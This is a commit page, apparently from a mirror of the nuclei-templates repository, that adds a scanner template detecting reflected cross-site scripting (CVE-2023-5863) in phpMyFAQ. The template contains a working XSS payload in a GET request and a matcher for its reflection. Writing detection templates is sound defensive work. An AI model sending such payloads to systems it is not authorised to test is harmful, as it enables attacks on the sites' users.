daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Create CVE-2023-5863.yaml

patch-10
ctflearner 2024-08-15 15:51:42 +05:30 committed by GitHub
parent 1233e71e5a
commit f3face915b
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 34 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

34
http/cves/2023/CVE-2023-5863.yaml Normal file
View File

@ -0,0 +1,34 @@
id: CVE-2023-5863
info:
name: phpMyFAQ < 3.2.0 - Cross-site Scripting (XSS) - Reflected
author: ctflearner
severity: medium
description: |
Cross-site Scripting (XSS) - Reflected in GitHub repository thorsten/phpmyfaq prior to 3.2.2.
reference:
- https://huntr.com/bounties/fbfd4e84-61fb-4063-8f11-15877b8c1f6f
- https://nvd.nist.gov/vuln/detail/CVE-2023-5863
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-5863
cwe-id: CWE-79
metadata:
verified: true
max-request: 1
product: phpMyFAQ
tags: cve2023,cve,huntr,phpMyFAQ,reflectedxss,xss
http:
- method: GET
path:
- "{{BaseURL}}/admin/index.php?action=ngductung"><img src/onerror="alert('XSS')"
matchers:
- type: word
part: body
words:
- "alert('XSS')"